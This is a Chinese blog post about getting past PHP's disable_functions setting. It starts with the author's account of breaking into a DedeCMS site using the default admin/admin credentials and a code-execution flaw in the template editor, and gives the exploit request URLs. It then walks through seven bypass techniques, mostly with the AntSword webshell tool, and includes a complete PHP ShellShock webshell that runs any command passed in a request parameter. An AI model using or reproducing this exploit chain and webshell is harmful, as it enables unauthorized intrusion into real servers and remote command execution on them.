热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

突破PHPdisable_functions禁用函数常用绕过姿势

前言:最近拿到一个shell,被禁用了php中能直接执行系统程序的函数,虽然最后没有绕过成功。但是也有不小的收获。首先说下shell怎么

前言:最近拿到一个shell,被禁用了 php中能直接执行系统程序的函数,虽然最后没有绕过成功。但是也有不小的收获。

首先说下shell怎么来的
一个织梦的站,找到后台登录路径。随手输入默认账户密码:admin/admin,顺利进入后台
利用DedeCMS V5.7 SP2后台存在代码执行漏洞拿到shell
1.首先获取token。访问域名 + /dede/tpl.php?action=upload

http://127.0.0.1/uploads/dede/tpl.php?action=upload

通过查看页面源码即可获得 token
在这里插入图片描述
2.然后访问

http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&cOntent= phpinfo();?>&token=你的token值

3.shell 地址

http://127.0.0.1/include/taglib/secnote.lib.php

在这里插入图片描述
无法执行任何命令,但是可以进行文件上传。起初以为是我的一句话木马有问题。上传个冰蝎马儿
在这里插入图片描述
看到这个提示大概猜到函数被禁用,查看phpinfo的确认
在这里插入图片描述
禁用了下列函数

passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

常用绕过姿势
1.利用 LD_PRELOAD 环境变量

在UNIX的动态链接库的世界中,LD_PRELOAD是一个有趣的环境变量,它可以影响程序运行时的链接,它允许你定义在程序运行前优先加载的动态链接库。如果你想进一步了解这些知识,可以去网上搜索相关文章,这里不做过多解释。

使用条件:

putenv
mail or error_log
存在可写的目录, 需要上传 .so 文件

项目地址:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
在这里推荐个中国蚁剑的插件
在这里插入图片描述
一键生成shell,成功后可以看到 /var/www/html/ 目录下新建了一个 .antproxy.php 文件。创建副本, 并将连接的 URL shell 脚本名字改为 .antproxy.php, 就可以成功执行命令。

2.利用 ShellShock (CVE-2014-6271)
使用条件

putenv
mail or error_log
/bin/bash 存在 CVE-2014-6271 漏洞
/bin/sh -> /bin/bash sh 默认的 shell bash

源码

<?php
function runcmd($c){$d = dirname($_SERVER["SCRIPT_FILENAME"]);if(substr($d, 0, 1) == "/" && function_exists(&#39;putenv&#39;) && (function_exists(&#39;error_log&#39;) || function_exists(&#39;mail&#39;))){if(strstr(readlink("/bin/sh"), "bash")!=FALSE){$tmp=tempnam(sys_get_temp_dir(), &#39;as&#39;);putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (function_exists(&#39;error_log&#39;)) {error_log("a", 1);}else{mail("a@127.0.0.1", "", "", "-bv");}}else{print("Not vuln (not bash)\n");}$output = @file_get_contents($tmp);@unlink($tmp);if($output!=""){print($output);}else{print("No output, or not vuln.");}}else{print("不满足使用条件");}
}// runcmd("whoami"); // 要执行的命令
runcmd($_REQUEST["cmd"]); // ?cmd=whoami
?>

AntSword 虚拟终端中已经集成了对 ShellShock 的利用, 直接在虚拟终端执行命令即可

3.利用 Apache Mod CGI

使用条件

Apache + PHP (apache 使用 apache_mod_php)
Apache 开启了 cgi, rewrite
Web 目录给了 AllowOverride 权限
当前目录可写

在这里插入图片描述
刚点进来的时候, 左侧状态栏处都是 NO,点击「开始」按钮后,成功之后, 会创建一个新的「虚拟终端」

4.PHP-FPM

使用条件

PHP-FPM
存在可写的目录, 需要上传 .so 文件

在这里插入图片描述
注意该模式下需要选择 PHP-FPM 的接口地址, 需要自行找配置文件查 FPM 接口地址, 默认的是 unix:/// 本地 socket 这种的,如果配置成 TCP 的默认是 127.0.0.1:9000,成功后可以看到 目录下新建了一个 .antproxy.php 文件。我们创建副本, 并将连接的 URL shell 脚本名字改为 .antproxy.php, 就可以成功执行命令
5. Json Serializer UAF
使用条件


PHP 版本
7.1 - all versions to date
7.2 < 7.2.19 (released: 30 May 2019)
7.3 < 7.3.6 (released: 30 May 2019)

使用「绕过 disable_functions」插件, 选择 Json Serializer UAF 模式进行
在这里插入图片描述
点击「开始」按钮后,成功之后, 会创建一个新的「虚拟终端」,UAF 一次可能不成功,多次尝试

6.PHP7 GC with Certain Destructors UAF

PHP 版本
7.0 - all versions to date
7.1 - all versions to date
7.2 - all versions to date
7.3 - all versions to date

使用「绕过 disable_functions」插件, 选择 Json Serializer UAF 模式进行
在这里插入图片描述
点击「开始」按钮后,成功之后, 会创建一个新的「虚拟终端」,UAF 一次可能不成功,多次尝试

7.PHP74 FFI 扩展执行命令
使用条件

PHP >= 7.4
开启了 FFI 扩展且 ffi.enable=true

使用「绕过 disable_functions」插件, 选择 PHP74_FFI 模式进行
在这里插入图片描述
点击「开始」按钮后,成功之后, 会创建一个新的「虚拟终端」

参考链接:https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/


推荐阅读
  • 在PHP后端开发中遇到一个难题:通过第三方类文件发送短信功能返回的JSON字符串无法解析。本文将探讨可能的原因并提供解决方案。 ... [详细]
  • 本文详细介绍了一种通过MySQL弱口令漏洞在Windows操作系统上获取SYSTEM权限的方法。该方法涉及使用自定义UDF DLL文件来执行任意命令,从而实现对远程服务器的完全控制。 ... [详细]
  • 在尝试使用C# Windows Forms客户端通过SignalR连接到ASP.NET服务器时,遇到了内部服务器错误(500)。本文将详细探讨问题的原因及解决方案。 ... [详细]
  • yikesnews第11期:微软Office两个0day和一个提权0day
    点击阅读原文可点击链接根据法国大选被黑客干扰,发送了带漏洞的文档Trumps_Attack_on_Syria_English.docx而此漏洞与ESET&FireEy ... [详细]
  • Symfony是一个功能强大的PHP框架,以其依赖注入(DI)特性著称。许多流行的PHP框架如Drupal和Laravel的核心组件都基于Symfony构建。本文将详细介绍Symfony的安装方法及其基本使用。 ... [详细]
  • 深入探讨Web页面中的锚点交互设计
    本文旨在分享Web前端开发中关于网页锚点效果的实现与优化技巧。随着Web技术的发展,越来越多的企业开始重视前端开发的质量和用户体验,而锚点功能作为提升用户浏览体验的重要手段之一,值得深入研究。 ... [详细]
  • 当unique验证运到图片上传时
    2019独角兽企业重金招聘Python工程师标准model:public$imageFile;publicfunctionrules(){return[[[na ... [详细]
  • 一个登陆界面
    预览截图html部分123456789101112用户登入1314邮箱名称邮箱为空15密码密码为空16登 ... [详细]
  • 本文深入探讨了 PHP 实现计划任务的方法,包括其原理、具体实现方式以及在不同操作系统中的应用。通过详细示例和代码片段,帮助开发者理解和掌握如何高效地设置和管理定时任务。 ... [详细]
  • 在Linux系统上构建Web服务器的详细步骤
    本文详细介绍了如何在Linux系统上搭建Web服务器的过程,包括安装Apache、PHP和MySQL等关键组件,以及遇到的一些常见问题及其解决方案。 ... [详细]
  • 微信小程序:授权登录与手机号绑定
    本文详细介绍了微信小程序中用户授权登录及绑定手机号的流程,结合官方指引和实际开发经验,提供了一套完整的实现方案,帮助开发者更好地理解和应用。 ... [详细]
  • 本文深入探讨了MySQL中常见的面试问题,包括事务隔离级别、存储引擎选择、索引结构及优化等关键知识点。通过详细解析,帮助读者在面对BAT等大厂面试时更加从容。 ... [详细]
  • 本文详细介绍了Java中实现异步调用的多种方式,包括线程创建、Future接口、CompletableFuture类以及Spring框架的@Async注解。通过代码示例和深入解析,帮助读者理解并掌握这些技术。 ... [详细]
  • 本文详细介绍了 Linux 系统中用户、组和文件权限的设置方法,包括基本权限(读、写、执行)、特殊权限(SUID、SGID、Sticky Bit)以及相关配置文件的使用。 ... [详细]
  • 本文详细介绍了 Python 中的 with 语句及其背后的上下文管理器机制,从基本概念入手,通过具体示例和原理分析,帮助读者深入理解这一重要的资源管理工具。 ... [详细]
author-avatar
肖顾问
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有